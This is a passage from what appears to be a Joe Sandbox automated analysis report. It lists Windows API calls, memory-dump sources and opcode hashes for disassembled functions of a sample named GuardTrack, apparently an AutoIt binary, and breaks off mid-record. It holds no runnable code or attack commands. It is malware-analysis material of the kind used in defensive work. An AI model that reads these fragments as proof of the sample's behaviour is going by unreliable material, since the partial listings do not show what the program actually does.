                                                          • Instruction Fuzzy Hash: 9911CC7600411DBFEB129F90DC48EDA7F6EEF05364F048061BA1856161D771AE65DBA0
                                                          APIs
                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 005D07EC
                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 005D07F4
                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 005D07FF
                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 005D080A
                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 005D0812
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 005D081A
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Virtual
                                                          • String ID:
                                                          • API String ID: 4278518827-0
                                                          • Opcode ID: 95520d39a63c37f22b4a8f9f724ecf3aeaa5172955ce23051922569acef65bc3
                                                          • Instruction ID: d318eba7fd63f7f585438155b1d81304e2c378087b726c105e072664a4b15beb
                                                          • Opcode Fuzzy Hash: 95520d39a63c37f22b4a8f9f724ecf3aeaa5172955ce23051922569acef65bc3
                                                          • Instruction Fuzzy Hash: 38016CB09027597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A868CBE5
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006159B4
                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006159CA
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 006159D9
                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006159E8
                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006159F2
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006159F9
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 839392675-0
                                                          • Opcode ID: da2323e69fa877ffa4c598b8ce39590fb7a642a152619324ae6b111f12d87acd
                                                          • Instruction ID: 1ef99cb05fa8c4e7e01c075e9b2a970fdbb1ef9cd302bec4b0853d13fbb06029
                                                          • Opcode Fuzzy Hash: da2323e69fa877ffa4c598b8ce39590fb7a642a152619324ae6b111f12d87acd
                                                          • Instruction Fuzzy Hash: 4FF01D3A241168BBF7215B929C0DEEF7E7DEBC7B11F001159FA0592150D7B01A1186B5
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,?), ref: 006177FE
                                                          • EnterCriticalSection.KERNEL32(?,?,005BC2B6,?,?), ref: 0061780F
                                                          • TerminateThread.KERNEL32(00000000,000001F6,?,005BC2B6,?,?), ref: 0061781C
                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,005BC2B6,?,?), ref: 00617829
                                                            • Part of subcall function 006171F0: CloseHandle.KERNEL32(00000000,?,00617836,?,005BC2B6,?,?), ref: 006171FA
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0061783C
                                                          • LeaveCriticalSection.KERNEL32(?,?,005BC2B6,?,?), ref: 00617843
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                          • String ID:
                                                          • API String ID: 3495660284-0
                                                          • Opcode ID: 9de0dffcaa71bac98d3a48a4a94882ce193bd5c394cd70cc5c39203ea0b3c437
                                                          • Instruction ID: 70e1dbe122353919d443a35a106fc45c0aa15ddd5c7c1876f3903ecdd1f7d3c3
                                                          • Opcode Fuzzy Hash: 9de0dffcaa71bac98d3a48a4a94882ce193bd5c394cd70cc5c39203ea0b3c437
                                                          • Instruction Fuzzy Hash: 1CF05E3A155222ABE7512B64EC8CAEB777BFF46702B182825F203950A0CBB55941DB60
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00609555
                                                          • UnloadUserProfile.USERENV(?,?), ref: 00609561
                                                          • CloseHandle.KERNEL32(?), ref: 0060956A
                                                          • CloseHandle.KERNEL32(?), ref: 00609572
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0060957B
                                                          • HeapFree.KERNEL32(00000000), ref: 00609582
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                          • String ID:
                                                          • API String ID: 146765662-0
                                                          • Opcode ID: c9b6db6ecfcad5a113f33d129a33744072e551cce24115e704a9c1b3cab2caa9
                                                          • Instruction ID: a07b191ffed48d30fb959fcf8447cbd290de9919d75df30e78e6eb74f035adaa
                                                          • Opcode Fuzzy Hash: c9b6db6ecfcad5a113f33d129a33744072e551cce24115e704a9c1b3cab2caa9
                                                          • Instruction Fuzzy Hash: 64E0E53E004122BBEB012FE1EC0C95ABF3AFF4A722B105620F71582470CB32A460DB50
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 00628CFD
                                                          • CharUpperBuffW.USER32(?,?), ref: 00628E0C
                                                          • VariantClear.OLEAUT32(?), ref: 00628F84
                                                            • Part of subcall function 00617B1D: VariantInit.OLEAUT32(00000000), ref: 00617B5D
                                                            • Part of subcall function 00617B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00617B66
                                                            • Part of subcall function 00617B1D: VariantClear.OLEAUT32(00000000), ref: 00617B72
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                          • API String ID: 4237274167-1221869570
                                                          • Opcode ID: a5e58095646edfff4ef0ea12f6f66de7f7b75468bc99af12e87dfe70410e99d5
                                                          • Instruction ID: 6f0eb79aebf534f98e74eaadfb35085ba1226abdc6d1bd71adf61a98bd5a3b6a
                                                          • Opcode Fuzzy Hash: a5e58095646edfff4ef0ea12f6f66de7f7b75468bc99af12e87dfe70410e99d5
                                                          • Instruction Fuzzy Hash: 00917B746047019FC710DF24C98499ABBE6BFD9354F14892EF8898B3A2DB30E945CF52
                                                          APIs
                                                            • Part of subcall function 005C436A: _wcscpy.LIBCMT ref: 005C438D
                                                          • _memset.LIBCMT ref: 0061332E
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0061335D
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00613410
                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0061343E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                          • String ID: 0
                                                          • API String ID: 4152858687-4108050209
                                                          • Opcode ID: 7e94a7381527dccdbc36eb44dc18a27c90b148f67df53725ce857374501446ef
                                                          • Instruction ID: 332a7305cecb2d63cc8e046c9a672a87a797f4c04dee46da863cdb69a122fb1f
                                                          • Opcode Fuzzy Hash: 7e94a7381527dccdbc36eb44dc18a27c90b148f67df53725ce857374501446ef
                                                          • Instruction Fuzzy Hash: 8351D6315083619FD725AF28D845AEB7BE6AF85710F08452EF896D3391DB30CE84C756
                                                          APIs
                                                          • CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00628A0E,?,00000000), ref: 0063DF71
                                                          • SetErrorMode.KERNEL32(00000001,?,00000000,00000000,00000000,?,00628A0E,?,00000000,00000000), ref: 0063DFA7
                                                          • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 0063DFB8
                                                          • SetErrorMode.KERNEL32(00000000,?,00000000,00000000,00000000,?,00628A0E,?,00000000,00000000), ref: 0063E03A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                          • String ID: DllGetClassObject
                                                          • API String ID: 753597075-1075368562
                                                          • Opcode ID: ac61537657eebd15d2a2d160207a6ca8497be647bd6cbcb1d7bc995b98652e5f
                                                          • Instruction ID: eebea2e6b615e77d21dce1779a8bcb95e0b9d854e7267356a19ed8dd22de5823
                                                          • Opcode Fuzzy Hash: ac61537657eebd15d2a2d160207a6ca8497be647bd6cbcb1d7bc995b98652e5f
                                                          • Instruction Fuzzy Hash: CD419C75600204EFDB19CF55C884AAA7BAAEF44310F1480AEED059F286D7F2DD54CBE0
                                                          APIs
                                                          • _memset.LIBCMT ref: 00612F67
                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00612F83
                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00612FC9
                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00677890,00000000), ref: 00613012
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Menu$Delete$InfoItem_memset
                                                          • String ID: 0
                                                          • API String ID: 1173514356-4108050209
                                                          • Opcode ID: 38c31170a9adeca397f6e6e8f0ea5ec273e705173f5974e23dedf6db27daf3a2
                                                          • Instruction ID: 74b442c3268cdf9e2178d8660f3fa7b7c98ffd661ba1c751fd218508b473e9e6
                                                          • Opcode Fuzzy Hash: 38c31170a9adeca397f6e6e8f0ea5ec273e705173f5974e23dedf6db27daf3a2
                                                          • Instruction Fuzzy Hash: A241E1312083529FD720DF24C894F9ABBE6AF89310F084A1EF56697391DB70EA45CB56
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0062DEAE
                                                            • Part of subcall function 005C1462: _memmove.LIBCMT ref: 005C14B0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: BuffCharLower_memmove
                                                          • String ID: cdecl$none$stdcall$winapi
                                                          • API String ID: 3425801089-567219261
                                                          • Opcode ID: 064ea334e629d228c823bf7487e0a0770db4120b4cff892888bf0e20d24735ec
                                                          • Instruction ID: feb2af44bcf59c7ef1450a2541d0690ece174e674855ec5a438c2caef94063dd
                                                          • Opcode Fuzzy Hash: 064ea334e629d228c823bf7487e0a0770db4120b4cff892888bf0e20d24735ec
                                                          • Instruction Fuzzy Hash: FA319270500A26AFCF10EF94DA40AEEB7B6FF55310B10862AF866977D1DB71A905CF84
                                                          APIs
                                                            • Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77
                                                            • Part of subcall function 0060B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0060B7BD
                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00609ACC
                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00609ADF
                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00609B0F
                                                            • Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$_memmove$ClassName
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 365058703-1403004172
                                                          • Opcode ID: f52d50d38f8af2e2df8a75d0b98ca3b8582b40c424ca451553c7f50179e4f244
                                                          • Instruction ID: 3ab9c311a4218baafa2f3fd0095c418808653a41bc2317adba7ffe0a7b902c0d
                                                          • Opcode Fuzzy Hash: f52d50d38f8af2e2df8a75d0b98ca3b8582b40c424ca451553c7f50179e4f244
                                                          • Instruction Fuzzy Hash: E221B6759411047FDB18EBB4DC49DFFBB6AEF86360F104119F815A72D2DB344D069660
                                                          APIs
                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00621F18
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00621F3E
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00621F6E
                                                          • InternetCloseHandle.WININET(00000000), ref: 00621FB5
                                                            • Part of subcall function 00622B4F: GetLastError.KERNEL32(?,?,00621EE3,00000000,00000000,00000001), ref: 00622B64
                                                            • Part of subcall function 00622B4F: SetEvent.KERNEL32(?,?,00621EE3,00000000,00000000,00000001), ref: 00622B79
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                          • String ID:
                                                          • API String ID: 3113390036-3916222277
                                                          • Opcode ID: 37de02d2519f8c56d15c43f51e7fd9a8595aa05977d2224e94e1b2ebe37ce8a4
                                                          • Instruction ID: c6e3ffb65c51bdcc93ba01bd427d4b4d2d9b31b078cea19974d95e4b5ac34132
                                                          • Opcode Fuzzy Hash: 37de02d2519f8c56d15c43f51e7fd9a8595aa05977d2224e94e1b2ebe37ce8a4
                                                          • Instruction Fuzzy Hash: A421F2B5508628BFF7119F20ED95EBF77EEEB4A744F10401AF9059A200DB349D059FA2
                                                          APIs
                                                            • Part of subcall function 005B2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005B214F
                                                            • Part of subcall function 005B2111: GetStockObject.GDI32(00000011), ref: 005B2163
                                                            • Part of subcall function 005B2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 005B216D
                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00636A86
                                                          • LoadLibraryW.KERNEL32(?), ref: 00636A8D
                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00636AA2
                                                          • DestroyWindow.USER32(?), ref: 00636AAA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                          • String ID: SysAnimate32
                                                          • API String ID: 4146253029-1011021900
                                                          • Opcode ID: f1836eca7c34138989348d74f60cafb8ef997b47960a37693bcb1e6b47900ea5
                                                          • Instruction ID: ff95ea9bb2a7335c15c35386bea37c38c0ef2a81108907efd1c48735c63b85dd
                                                          • Opcode Fuzzy Hash: f1836eca7c34138989348d74f60cafb8ef997b47960a37693bcb1e6b47900ea5
                                                          • Instruction Fuzzy Hash: 3D218B71204209BFEF108F64DC80EFB77AAEB5A324F10D618FA51A3290D3719C5197A0
                                                          APIs
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00617377
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006173AA
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 006173BC
                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 006173F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: 43746aa5c70c3e0d8877bc97db128a509e101e8baef203e0aaf5d0d49f864a47
                                                          • Instruction ID: 1fa0d4b9ee4b32a9b578cf362754c24a0a380be524485fc868744afbb6e498e0
                                                          • Opcode Fuzzy Hash: 43746aa5c70c3e0d8877bc97db128a509e101e8baef203e0aaf5d0d49f864a47
                                                          • Instruction Fuzzy Hash: DC218174508306ABDB208F68DC05ADA7BF6AF55720F284B19FDB0D72D0D7709991EB60
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00617444
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00617476
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00617487
                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006174C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: 8aec60e88078b52d16b603530f082a5b44d20f6928f1159852e4a4cbe9de74c9
                                                          • Instruction ID: da6680eba6790e8a70497a3714bddd474e5c7b29766af8fe700a0a3fcb05056b
                                                          • Opcode Fuzzy Hash: 8aec60e88078b52d16b603530f082a5b44d20f6928f1159852e4a4cbe9de74c9
                                                          • Instruction Fuzzy Hash: 7321C1356083069BDB209F689C44ADA7BFAAF55730F280B19FDA1D73D0DB709981CB50
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 0061B297
                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0061B2EB
                                                          • __swprintf.LIBCMT ref: 0061B304
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00640980), ref: 0061B342
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                          • String ID: %lu
                                                          • API String ID: 3164766367-685833217
                                                          • Opcode ID: d9e407c5900d94053f54b9b1ef5cc6ebd67bed33b4fddaa5e12ed770b7073475
                                                          • Instruction ID: efaecf86aab3b2cfda28193f2b806c2b0ea46b31d33c91fbaf712e18766369b7
                                                          • Opcode Fuzzy Hash: d9e407c5900d94053f54b9b1ef5cc6ebd67bed33b4fddaa5e12ed770b7073475
                                                          • Instruction Fuzzy Hash: D1217135A00109AFCB10DFA5C849DEEBBB9FF89704B144069F905D7392DB71EA45CB61
                                                          APIs
                                                            • Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B
                                                            • Part of subcall function 0060AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0060AA6F
                                                            • Part of subcall function 0060AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0060AA82
                                                            • Part of subcall function 0060AA52: GetCurrentThreadId.KERNEL32 ref: 0060AA89
                                                            • Part of subcall function 0060AA52: AttachThreadInput.USER32(00000000), ref: 0060AA90
                                                          • GetFocus.USER32 ref: 0060AC2A
                                                            • Part of subcall function 0060AA9B: GetParent.USER32(?), ref: 0060AAA9
